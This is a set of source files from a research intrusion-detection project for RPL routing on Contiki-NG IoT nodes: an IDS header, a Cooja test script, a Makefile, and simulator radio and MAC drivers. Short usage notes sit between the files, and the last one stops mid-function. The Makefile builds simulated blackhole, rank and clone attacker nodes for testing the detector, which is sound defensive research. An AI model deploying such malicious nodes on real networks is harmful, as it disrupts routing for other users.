"blob_id": "1178fc841d6875e5a18abb04260db0efc6534ed7",
"content_id": "9e3ce3bfcc181e96f7b1b6ba01e10f9b4dfe67e9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2196,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 104,
"path": "/os/net/routing/ids-app/ids.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef IDS_H\n#define IDS_H\n\n#include \"os/net/ipv6/uip-debug.h\"\n#include \"contiki.h\"\n#include <stdio.h>\n#include <string.h>\n\n\n#include \"sys/ctimer.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"net/ipv6/uip-ds6.h\"\n#include \"os/net/routing/rpl-lite/rpl.h\"\n#include \"net/nbr-table.h\"\n\n#include <stdlib.h>\n#include <ctype.h>\n\n#if IDS_SERVER==1\n#pragma message (\"IDS_SERVER\")\n#define NODES_NUM 10 //Change this for future simulations\n#define DETECTORS_NUM 10\n#elif IDS_CLIENT==1\n#pragma message (\"IDS_CLIENT\")\n#define NODES_NUM_CL 10\n#else\n#pragma message (\"IDS_GENERAL\")\n#endif\n\n\n//Detectors_num=number of ids detectors\n//Nodes_num= number of neighbour malicious nodes\n//BR can save 5 mal nodes, ids det. save 10 mal\n// #if IDS_OF==0\n\ntypedef struct IDS_ctr{\n \n uint16_t address;\n //IDS detectors are 6\n #if IDS_SERVER==1 /*IDS_SERVER 3 detectors*/\n uip_ip6addr_t fromNode[DETECTORS_NUM];\n uint8_t counterDetect[DETECTORS_NUM];\n uint8_t blackhole_mal;\n #endif /*IDS_SERVER 3 detectors*/\n uint16_t counterMsg;\n uint16_t counterDIS;\n uint32_t intervals;\n uint32_t timestamp;\n char detected;\n uint16_t last_avg_rss;\n char spoof_suspicious;\n \n} ids_ctr_t;\n\n\n//Mine for IDS\nextern uip_ipaddr_t IdsServerAddr;\nextern uint16_t ip_end;\nextern uint16_t countInNodes;\n\n// #endif\n\n//3 instead of 6 detectors, 6 mal nodes\n#if IDS_SERVER==1 /*IDS_SERVER*/\nextern uint16_t detectorsIP[DETECTORS_NUM];\nvoid checkNodes();\n#endif /*IDS_SERVER*/\n\n\n//Average time,number of DIS for IDS\n//typedef struct IDS_ctr ids_ctr_t;\n\n#if IDS_SERVER==1 /*IDS_SERVER*/\nids_ctr_t nodes[NODES_NUM];\n#elif IDS_CLIENT==1\nids_ctr_t nodes[NODES_NUM_CL];\nstruct etimer time_sniff,packet_fw_timer;\n\n//IDS client struct to check Blackhole attack\ntypedef struct tagids{\n uint8_t dest[4]; //max number of parents to send packet\n // char from;\n uint8_t verified[4];\n uint8_t index;\n uint16_t count_fw_packets[4];\n} fw_stats;\n\nNBR_TABLE_DECLARE(nbr_fw_stats);\n\nfw_stats tmp_ip_senders[NODES_NUM_CL];\n#endif\n\n\n#if IDS_OF==1\n\n// typedef struct ids_item ids_item_t;\nvoid update_list(uint8_t mal_node);\nint check_list(uint8_t item);\nvoid remove_from_list(uint8_t ip);\nvoid rm_bh_from_nbr_table(uip_ipaddr_t* from);\n\n#endif\n\n#endif"
},
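The NBR_TABLE_DECLARE(nbr_fw_stats) in ids.h pairs with a table definition and registration elsewhere (not part of this record). A minimal sketch of that Contiki-NG neighbor-table pattern, matching how the IDS client code above walks the table; assumes compilation with IDS_CLIENT=1 so that fw_stats is defined:

    #include "net/nbr-table.h"
    #include "ids.h"                       /* fw_stats, NBR_TABLE_DECLARE */

    NBR_TABLE(fw_stats, nbr_fw_stats);     /* one fw_stats entry per L2 neighbor */

    void fw_stats_init(void)
    {
      nbr_table_register(nbr_fw_stats, NULL);  /* NULL: no eviction callback */
    }

    void fw_stats_walk(void)
    {
      fw_stats *m;
      for(m = nbr_table_head(nbr_fw_stats); m != NULL;
          m = nbr_table_next(nbr_fw_stats, m)) {
        linkaddr_t *lladdr = nbr_table_get_lladdr(nbr_fw_stats, m);
        (void)lladdr;  /* per-neighbor stats live in m->count_fw_packets[] etc. */
      }
    }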
{
"alpha_fraction": 0.5222052335739136,
"alphanum_fraction": 0.5336906313896179,
"avg_line_length": 19.73015785217285,
"blob_id": "7168bbadba992433215fc5a46e90bf89b71afa24",
"content_id": "1b455bd449b1dd254c6a444a3fae9cdb1259387b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1306,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 63,
"path": "/tools/cooja/Testing/RUN_TEST.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 -o $# -gt 2 ]; then\n echo \"Usage: $0 <test> [logfile]\"\n exit\nfi\n\nTEST=$1\n\nLOG=/dev/null\nif [ $# -eq 2 ]; then\n LOG=$2\nfi\n\necho \">>>>>>> Starting test: $TEST <<<<<<<<\"\necho -n \"[`date '+%F %T'`] $TEST: \" >> $LOG\n#if [ -f \"COOJA.log\" ]; then\n# rm COOJA.log\n#fi\n#if [ -f \"COOJA.testlog\" ]; then\n# rm COOJA.testlog\n#fi\njava -mx512m -jar ../dist/cooja.jar -nogui=$TEST.csc\nif [ -f \"COOJA.log\" ]; then\n mv COOJA.log $TEST.cooja_log\nfi\nif [ -f \"COOJA.testlog\" ]; then\n mv COOJA.testlog $TEST.log\nfi\n\nOK=0\nif [ -f \"$TEST.log\" ]; then\n OK=`grep \"TEST OK\" $TEST.log | wc -l`\nfi\n\nif [ $OK == 0 ]; then\n echo \"FAIL\" >> $LOG\n if [ -f \"$TEST.info\" ]; then\n echo \"-- TEST INFO ($TEST.info) --\" >> $LOG\n cat $TEST.info >> $LOG\n else\n echo \"-- NO TEST INFO AVAILABLE ($TEST.info) --\" >> $LOG\n fi\n if [ -f \"$TEST.log\" ]; then\n echo \"-- TEST OUTPUT (tail $TEST.log) --\" >> $LOG\n tail -5 $TEST.log >> $LOG\n else\n echo \"-- NO TEST OUTPUT AVAILABLE ($TEST.log) --\" >> $LOG\n fi\n echo \"-- COOJA OUTPUT (tail $TEST.cooja_log) --\" >> $LOG\n tail -10 $TEST.cooja_log >> $LOG\necho >> $LOG\nelse\n echo \"OK\" >> $LOG\nfi\necho >> $LOG\n\nif [ $OK == 0 ]; then\n echo \">>>>>>> Finished test: $TEST FAILED <<<<<<<<\"\nelse\n echo \">>>>>>> Finished test: $TEST OK <<<<<<<<\"\nfi\necho \"\"\n"
},
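Usage, per the script's own usage string. The test name and log file below are illustrative; the matching .csc simulation must sit next to the script, and the verdict line ("OK"/"FAIL") is appended to the log per run:

    ./RUN_TEST.sh rpl-ids-test run-results.log
    tail -2 run-results.log    # shows the appended OK/FAIL verdict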
{
"alpha_fraction": 0.7135792970657349,
"alphanum_fraction": 0.7386839389801025,
"avg_line_length": 25.02970314025879,
"blob_id": "a69db404428dd1f04d43741102d17f605392d576",
"content_id": "9c4b20c9bddb1160319d5ff390a8302410061d61",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 2629,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 101,
"path": "/examples/rpl-udp/Makefile",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "CONTIKI_PROJECT = udp-client udp-server\nTARGET1=whitefield\n\n# all: \n# \tsudo make udp-server TARGET=$(TARGET1) IDS_SERVER=1 RPL_CONF_DEFAULT_INSTANCE=0\n# \tsudo make udp-client-ids TARGET=$(TARGET1) IDS_CLIENT=1 RPL_CONF_DEFAULT_INSTANCE=0\n# \tsudo make udp-client-mal TARGET=$(TARGET1) IDS_CLIENT=2\n# \tsudo make udp-client-clone TARGET=$(TARGET1) IDS_CLIENT=3\n# \tsudo make udp-client TARGET=$(TARGET1) IDS_CLIENT=0 RPL_CONF_DEFAULT_INSTANCE=1\n\n#Normal server, instance 0\nudp-server:\nifeq ($(IDS_SERVER),0)\n$(info 'SERVER')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\t# MODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=server\nendif\n\n#IDS server, instance 1\nudp-server:\nifeq ($(IDS_SERVER),1)\n$(info 'SERVER')\n\tDEFINES+=IDS_SERVER=1 RPL_CONF_DEFAULT_INSTANCE=1\n\tDEFINES+=IDS_CLIENT=0\n\tMODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=server\nendif\n\nudp-client-ids: \nifeq ($(IDS_CLIENT),1)\n$(info 'IDSCLIENT')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=1\n\tDEFINES+=IDS_CLIENT=1 \n\tDEFINES+=RPL_CONF_DEFAULT_LEAF_ONLY=0\n\t# DEFINES+=RPL_CONF_DAO_MAX_RETRANSMISSIONS=3 LINK_STATS_CONF_ETX_FROM_PACKET_COUNT=1\n\tMODULES=os/net/routing/ids-app\n\t# BUILD_DIR_CONFIG=ids-client\n$(info DEFINE $(DEFINES))\nendif\n\n#Used for blackhole or clone nodes\nudp-client-mal:\nifeq ($(IDS_CLIENT),2)\n$(info 'MALICIOUS')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=1\n\t# DEFINES+=RPL_CONF_DIS_INTERVAL=30*CLOCK_SECOND\n\tDEFINES+=MAL_DIS=0\n\tDEFINES+=MAL_BLACKHOLE=1 MAL_RANK=1\n# \tBUILD_DIR_CONFIG=malicious\nendif\n\n#For clone only or malicious and clone\nudp-client-clone:\nifeq ($(IDS_CLIENT),3)\n$(info 'CLONE ONLY')\n\tDEFINES+=IDS_SERVER=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=0\n\tDEFINES+=CLONE_ATTACK=1\n\tDEFINES+=MAL_DIS=0\n# \tBUILD_DIR_CONFIG=clone_only\nendif\n\nifeq ($(IDS_CLIENT),4)\n$(info 'MALICIOUS and CLONE')\n\tDEFINES+=IDS_SERVER=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=MALICIOUS=1\n\tDEFINES+=CLONE_ATTACK=1\n\tDEFINES+=MAL_DIS=1\n\tDEFINES+=RPL_CONF_DIS_INTERVAL=0\n# \tBUILD_DIR_CONFIG=clone_malicious\nendif\n\n#defined packet_counters to give me stats for nbr and IDS\nudp-client:\nifeq ($(IDS_CLIENT),0)\n$(info 'NORMAL')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\tDEFINES+=IDS_OF=1\n\tDEFINES+=MALICIOUS=0\n\tDEFINES+=CLONE_ATTACK=0\n\tDEFINES+=LINK_STATS_CONF_PACKET_COUNTERS=1 LINK_STATS_CONF_ETX_FROM_PACKET_COUNT=1\n\tDEFINES+=UIP_CONF_STATISTICS=1\n\tMODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=normal\nendif\n\nCONTIKI=../..\n\nCONTIKI_WITH_IPV6 = 1\n\ninclude $(CONTIKI)/Makefile.include\n\n# all: $(CONTIKI_PROJECT)\n## enable packet counting\n"
},
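The commented-out all: target at the top of this Makefile shows the intended invocations; spelled out per conditional branch (TARGET1 expands to whitefield; sudo dropped for brevity):

    make udp-server TARGET=whitefield IDS_SERVER=1       # IDS root (RPL instance 1)
    make udp-client-ids TARGET=whitefield IDS_CLIENT=1   # IDS detector node
    make udp-client-mal TARGET=whitefield IDS_CLIENT=2   # blackhole + rank attacker
    make udp-client-clone TARGET=whitefield IDS_CLIENT=3 # clone-only attacker
    make udp-client TARGET=whitefield IDS_CLIENT=0       # benign node, trust OF + packet counters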
{
"alpha_fraction": 0.5400213599205017,
"alphanum_fraction": 0.5602988004684448,
"avg_line_length": 21.309524536132812,
"blob_id": "b21147ee5cdcbae2866a6fe13b9547a58383f155",
"content_id": "edcec17dc025383b96ed509300c11ff9c07aa79a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 937,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 42,
"path": "/arch/platform/whitefield/command_ns_mop.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_NS_MOP_C_\n\n#include \"command.h\"\n\n#if RPL_WITH_NON_STORING\n\n#include \"net/rpl/rpl-ns.h\"\n\nint get_route_list(FILE *fp, char *buf, int buflen)\n{\n rpl_ns_node_t *r;\n char ipstr[128], parent[128];\n int n=0, wr_comma=0;\n uip_ipaddr_t ip;\n\n for(r = rpl_ns_node_head(); r != NULL;\n r = rpl_ns_node_next(r)) \n {\n rpl_ns_get_node_global_addr(&ip, r);\n uip_ipaddr_to_str(&ip, ipstr, sizeof(ipstr));\n rpl_ns_get_node_global_addr(&ip, r->parent);\n uip_ipaddr_to_str(&ip, parent, sizeof(parent));\n if(wr_comma) {\n ADD2BUF(fp, \",\");\n }\n wr_comma=1;\n ADD2BUF(fp, \"{ \\\"prefix\\\": \\\"%s\\\", \\\"pref_len\\\": \\\"%d\\\", \\\"parent\\\": \\\"%s\\\" }\\n\", \n ipstr, 128, parent);\n if(n > buflen-100) {\n n += snprintf(buf+n, buflen-n, \"[TRUNC]\");\n break;\n }\n }\n return n;\n}\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen)\n{\n return snprintf(buf, buflen, \"%d\", uip_sr_num_nodes());\n}\n\n#endif\n"
},
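Each route entry emitted by get_route_list() in the non-storing variant above has the following shape (addresses illustrative); note that this variant passes the literal 128 as pref_len rather than the entry's actual prefix length, unlike the storing-mode counterpart further below which uses r->length:

    { "prefix": "fd00::205:5:5:5", "pref_len": "128", "parent": "fd00::201:1:1:1" }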
{
"alpha_fraction": 0.5534979701042175,
"alphanum_fraction": 0.5599279999732971,
"avg_line_length": 27.372262954711914,
"blob_id": "939c0ed184c66d9ff1f596514896da41219d408f",
"content_id": "4262e309e0b68ca0a73367151e8c800963b4de5c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3888,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 137,
"path": "/arch/platform/whitefield/dev/wfmac_driver.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include \"os/net/mac/nullmac/nullmac.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"os/net/ipv6/tcpip.h\"\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n#include \"lib/random.h\"\n\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include \"commline/commline.h\"\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"wfmac\"\n#define LOG_LEVEL LOG_LEVEL_MAIN\n\nextern uint16_t gNodeID;\n\nmac_callback_t g_mac_sent_cb;\n/*---------------------------------------------------------------------------*/\nstatic void send_packet(mac_callback_t sent, void *ptr)\n{\n\tDEFINE_MBUF(mbuf);\n\n\tif(!g_mac_sent_cb && sent) {\n\t\tg_mac_sent_cb = sent;\n\t} else if(g_mac_sent_cb && sent != g_mac_sent_cb) {\n\t\tERROR(\"****** Didnt expect different MAC SENT CB ********\\n\");\n\t\t/*RJ: If this condn is hit means some additional code is required\n\t\tto manage the sent/ptr values ... have to maintain a queue and\n\t\tpush the sent/ptr in every unicast case, so that when ACK is \n\t\trcvd, the sent/ptr are appropriately retrieved from queue */\n\t\treturn;\n\t}\n\n\tmbuf->len = packetbuf_totlen();\n\tmemcpy(mbuf->buf, packetbuf_hdrptr(), packetbuf_totlen());\n\tmbuf->src_id = gNodeID;\n\tmbuf->dst_id = cl_get_longaddr2id((uint8_t*)packetbuf_addr(PACKETBUF_ADDR_RECEIVER));\n\tINFO(\"src:%0x dst:%0x len:%d\\n\", mbuf->src_id, mbuf->dst_id, mbuf->len);\n\tif(CL_SUCCESS != cl_sendto_q(MTYPE(AIRLINE, CL_MGR_ID), mbuf, mbuf->len + sizeof(msg_buf_t))) {\n\t\tmac_call_sent_callback(sent, ptr, MAC_TX_ERR_FATAL, 3);\n\t}\n}\n\nint get_tx_status(uint8_t wf_status, char *statstr, size_t len)\n{\n\tswitch(wf_status) {\n\t\tcase WF_STATUS_ACK_OK:\n\t\t\tsnprintf(statstr, len, \"ACK_OK\");\n\t\t\treturn MAC_TX_OK;\n\t\tcase WF_STATUS_NO_ACK:\n\t\t\tsnprintf(statstr, len, \"NO_ACK\");\n\t\t\treturn MAC_TX_NOACK;\n\t\tcase WF_STATUS_ERR:\n\t\t\tsnprintf(statstr, len, \"TX_ERR\");\n\t\t\treturn MAC_TX_ERR;\n\t\tdefault:\n\t\t\tsnprintf(statstr, len, \"TX_FATAL\");\n\t\t\treturn MAC_TX_ERR_FATAL;\n\t}\n\treturn 0;\n}\n\nvoid mac_handle_ack(msg_buf_t *mbuf)\n{\n\tchar statstr[32];\n\tint status;\n\n\tif(!g_mac_sent_cb) { \n\t\tERROR(\"How can mac sent cb is not set when ACK is rcvd!\\n\");\n\t\treturn;\n\t}\n\tstatus = get_tx_status(mbuf->info.ack.status, statstr, sizeof(statstr));\n\tINFO(\"ACK status:%s retries:%d\\n\", statstr, mbuf->info.ack.retries);\n\tmac_call_sent_callback(g_mac_sent_cb, NULL, status, mbuf->info.ack.retries);\n}\n\n/*---------------------------------------------------------------------------*/\nstatic void packet_input(void)\n{\n\tNETSTACK_NETWORK.input();\n}\n/*---------------------------------------------------------------------------*/\nstatic int on(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int off(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int max_payload(void)\n{\n int framer_hdrlen;\n radio_value_t max_radio_payload_len;\n radio_result_t res;\n\n framer_hdrlen = NETSTACK_FRAMER.length();\n\n res = NETSTACK_RADIO.get_value(RADIO_CONST_MAX_PAYLOAD_LEN,\n &max_radio_payload_len);\n\n if(res == RADIO_RESULT_NOT_SUPPORTED) {\n ERROR(\"Failed to retrieve max radio driver payload length\\n\");\n return 0;\n }\n\n if(framer_hdrlen < 0) {\n /* Framing failed, we assume the maximum header length */\n#define WFMAC_MAX_HDR 21 // copied from CSMA_MAC_MAX_HEADER\n framer_hdrlen = WFMAC_MAX_HDR;\n }\n\n return 
MIN(max_radio_payload_len, PACKETBUF_SIZE)\n - framer_hdrlen\n - LLSEC802154_PACKETBUF_MIC_LEN();\n}\n/*---------------------------------------------------------------------------*/\nstatic void init(void)\n{\n INFO(\"Initing wfmac_driver\\n\");\n}\n/*---------------------------------------------------------------------------*/\nconst struct mac_driver wfmac_driver = {\n\t\"wfmac\",\n\tinit,\n\tsend_packet,\n\tpacket_input,\n\ton,\n\toff,\n\tmax_payload,\n};\n/*---------------------------------------------------------------------------*/\n\n"
},
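get_tx_status() in the driver above maps Whitefield ACK status bytes onto Contiki MAC result codes before mac_handle_ack() forwards them through mac_call_sent_callback(). A hedged usage fragment; the header paths and the WF_STATUS_*/MAC_TX_* macros are assumed from the includes in the file:

    #include <stdint.h>
    #include <stddef.h>
    #include "commline/commline.h"   /* WF_STATUS_* (assumed location) */
    #include "net/mac/mac.h"         /* MAC_TX_* result codes */

    int get_tx_status(uint8_t wf_status, char *statstr, size_t len); /* from the driver */

    /* Returns nonzero when the MAC layer should treat the frame as delivered. */
    int tx_was_acked(uint8_t wf_status)
    {
      char statstr[32];
      return get_tx_status(wf_status, statstr, sizeof(statstr)) == MAC_TX_OK;
    }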
{
"alpha_fraction": 0.5032090544700623,
"alphanum_fraction": 0.5095038414001465,
"avg_line_length": 27.229965209960938,
"blob_id": "0b074214990e3f9d958175e8190fa2f5ec381ad3",
"content_id": "9af97eb5f6055bebabbb33a66a246ff829faeddd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8102,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 287,
"path": "/arch/platform/whitefield/dev/wfradio_driver.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n\n#include \"contiki.h\"\n\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n\n#include \"dev/radio.h\"\n#include \"wfradio_driver.h\"\n#include \"commline/commline.h\"\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"wfradio\"\n#define LOG_LEVEL LOG_LEVEL_MAIN\n\nPROCESS(wfradio_process, \"whitefield radio process\");\n/*---------------------------------------------------------------------------*/\nstatic void\nset_send_on_cca(uint8_t enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_frame_filtering(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_auto_ack(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset_poll_mode(int enable)\n{\n}\n/*---------------------------------------------------------------------------*/\nvoid\nradio_set_channel(int channel)\n{\n}\n/*---------------------------------------------------------------------------*/\nvoid\nradio_set_txpower(unsigned char power)\n{\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_signal_strength_last(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_signal_strength_current(void)\n{\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nint\nradio_LQI(void)\n{\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int\nradio_on(void)\n{\n INFO(\"turning ON whitefield radio\\n\");\n return 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int\nradio_off(void)\n{\n INFO(\"turning OFF whitefield radio\\n\");\n return 0;\n}\n\nextern void mac_handle_ack(msg_buf_t *mbuf);\nextern void sl_handle_cmd(msg_buf_t *mbuf);\n/*---------------------------------------------------------------------------*/\nextern uint16_t gNodeID;\nstatic int radio_read(void *inbuf, unsigned short bufsize)\n{\n\tint ret;\n\tlinkaddr_t addr;\n\tDEFINE_MBUF(mbuf);\n\n\tret = cl_recvfrom_q(MTYPE(STACKLINE, gNodeID), mbuf, sizeof(mbuf_buf), CL_FLAG_NOWAIT);\n\tif(mbuf->len == 0) {\n\t\treturn 0;\n\t}\n\tINFO(\"RECV ret:%d src:%x dst:%x len:%d flags:%x\\n\", \n\t\tret, mbuf->src_id, mbuf->dst_id, mbuf->len, mbuf->flags);\n\tif(mbuf->len > bufsize) {\n\t\tERROR(\"How can mbuflen(%d) be greater than bufsize:%d?!\\n\", mbuf->len, bufsize);\n\t\treturn 0;\n\t}\n\tif(mbuf->flags & MBUF_IS_CMD) {\n#if 1\n\t\t//Hack Alert!! Notice that the foll condn will never be true\n\t\t//This condition had to be added so that cmd_* function are linked in the \n\t\t//binary. Linker decides that cmd_* functions are never called from \n\t\t//any other place and optimizes out! But I need these functions to be \n\t\t//loaded dynamically using dlsym(). 
Using this check i sort of fool linker \n\t\t//into believing that the function is called, but the wrapping cond will \n\t\t//never be true.\n\t\tif(mbuf->len == 0xdead && mbuf->len == 0xc0de) {\n\t\t\textern int cmd_rtsize(uint16_t, char *, int);\n\t\t\tcmd_rtsize(0xbabe, NULL, 0xcafe);\n\t\t}\n#endif\n\t\tsl_handle_cmd(mbuf);\n\t\treturn 0;\n\t}\n\tmemcpy(inbuf, mbuf->buf, mbuf->len);\n\tcl_get_id2longaddr(mbuf->src_id, addr.u8, sizeof(addr.u8));\n\tpacketbuf_set_addr(PACKETBUF_ADDR_SENDER, &addr);\n\tcl_get_id2longaddr(mbuf->dst_id, addr.u8, sizeof(addr.u8));\n\tpacketbuf_set_addr(PACKETBUF_ADDR_RECEIVER, &addr);\n\tpacketbuf_set_attr(PACKETBUF_ATTR_RSSI, mbuf->info.sig.rssi);\n\tpacketbuf_set_attr(PACKETBUF_ATTR_LINK_QUALITY, mbuf->info.sig.lqi);\n\tif(mbuf->flags & MBUF_IS_ACK) {\n\t\tmac_handle_ack(mbuf);\n\t\treturn 0;\n\t}\n#if 0\n\tstatic int rcvd_cnt=0;\n\trcvd_cnt++;\n\tPRINT_HEX(mbuf->buf, mbuf->len, \"rcvd %d, len=%d\\n\", rcvd_cnt, mbuf->len);\n#endif\n\treturn mbuf->len;\n}\n/*---------------------------------------------------------------------------*/\nstatic int channel_clear(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nstatic int radio_send(const void *payload, unsigned short payload_len)\n{\n\treturn RADIO_TX_OK;\n}\n/*---------------------------------------------------------------------------*/\nstatic int prepare_packet(const void *data, unsigned short len)\n{\n\treturn len;\n}\n/*---------------------------------------------------------------------------*/\nstatic int transmit_packet(unsigned short len)\n{\n\tint ret = RADIO_TX_ERR;\n\treturn ret;\n}\n/*---------------------------------------------------------------------------*/\nstatic int receiving_packet(void)\n{\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic int pending_packet(void)\n{\n\treturn 1;\n}\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(wfradio_process, ev, data)\n{\n\tint len;\n\n\tPROCESS_BEGIN();\n\n\twhile(1) {\n\t\tPROCESS_YIELD_UNTIL(ev == PROCESS_EVENT_POLL);\n\t\tpacketbuf_clear();\n\t\tlen = radio_read(packetbuf_dataptr(), PACKETBUF_SIZE);\n\t\tif(len > 0) {\n\t\t\tpacketbuf_set_datalen(len);\n\t\t\tNETSTACK_MAC.input();\n\t\t}\n\t}\n\n\tPROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\nstatic int init(void)\n{\n process_start(&wfradio_process, NULL);\n INFO(\"initing wfradio\\n\");\n\tif(cl_init(MTYPE(STACKLINE, gNodeID), CL_ATTACHQ)!=CL_SUCCESS) {\n\t\tERROR(\"commline init failed\\n\");\n\t\treturn 1;\n\t}\n\treturn 0;\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t get_value(radio_param_t param, radio_value_t *value)\n{\n\tswitch(param) {\n\t\tcase RADIO_PARAM_RX_MODE:\n\t\t\t*value = 0;\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_TX_MODE:\n\t\t\t*value = 0;\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_LAST_RSSI:\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_LAST_LINK_QUALITY:\n\t\t\treturn RADIO_RESULT_OK;\n case RADIO_CONST_MAX_PAYLOAD_LEN:\n *value = (radio_value_t)125;\n return RADIO_RESULT_OK;\n\t\tdefault:\n\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t}\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t set_value(radio_param_t param, radio_value_t value)\n{\n\tswitch(param) {\n\t\tcase RADIO_PARAM_RX_MODE:\n\t\t\tif(value & 
~(RADIO_RX_MODE_ADDRESS_FILTER |\n\t\t\t\t\t\tRADIO_RX_MODE_AUTOACK | RADIO_RX_MODE_POLL_MODE)) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\n\t\t\t/* Only disabling is acceptable for RADIO_RX_MODE_ADDRESS_FILTER */\n\t\t\tif ((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0) {\n\t\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t\t\t}\n\t\t\tset_frame_filtering((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0);\n\n\t\t\t/* Only disabling is acceptable for RADIO_RX_MODE_AUTOACK */\n\t\t\tif ((value & RADIO_RX_MODE_ADDRESS_FILTER) != 0) {\n\t\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t\t\t}\n\t\t\tset_auto_ack((value & RADIO_RX_MODE_AUTOACK) != 0);\n\n\t\t\tset_poll_mode((value & RADIO_RX_MODE_POLL_MODE) != 0);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_TX_MODE:\n\t\t\tif(value & ~(RADIO_TX_MODE_SEND_ON_CCA)) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\t\t\tset_send_on_cca((value & RADIO_TX_MODE_SEND_ON_CCA) != 0);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tcase RADIO_PARAM_CHANNEL:\n\t\t\tif(value < 11 || value > 26) {\n\t\t\t\treturn RADIO_RESULT_INVALID_VALUE;\n\t\t\t}\n\t\t\tradio_set_channel(value);\n\t\t\treturn RADIO_RESULT_OK;\n\t\tdefault:\n\t\t\treturn RADIO_RESULT_NOT_SUPPORTED;\n\t}\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t get_object(radio_param_t param, void *dest, size_t size)\n{\n\treturn RADIO_RESULT_NOT_SUPPORTED;\n}\n/*---------------------------------------------------------------------------*/\nstatic radio_result_t set_object(radio_param_t param, const void *src, size_t size)\n{\n\treturn RADIO_RESULT_NOT_SUPPORTED;\n}\n/*---------------------------------------------------------------------------*/\nconst struct radio_driver wfradio_driver =\n{\n\tinit,\n\tprepare_packet,\n\ttransmit_packet,\n\tradio_send,\n\tradio_read,\n\tchannel_clear,\n\treceiving_packet,\n\tpending_packet,\n\tradio_on,\n\tradio_off,\n\tget_value,\n\tset_value,\n\tget_object,\n\tset_object\n};\n/*---------------------------------------------------------------------------*/\n"
},
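The radio process above only wakes on PROCESS_EVENT_POLL; it then drains one frame via radio_read() and hands it to NETSTACK_MAC.input(). So whatever detects an incoming commline message just needs to poll the process. Sketch (on_commline_frame is a hypothetical notification hook, not part of the driver):

    #include "contiki.h"

    extern struct process wfradio_process;

    void on_commline_frame(void)         /* hypothetical notification hook */
    {
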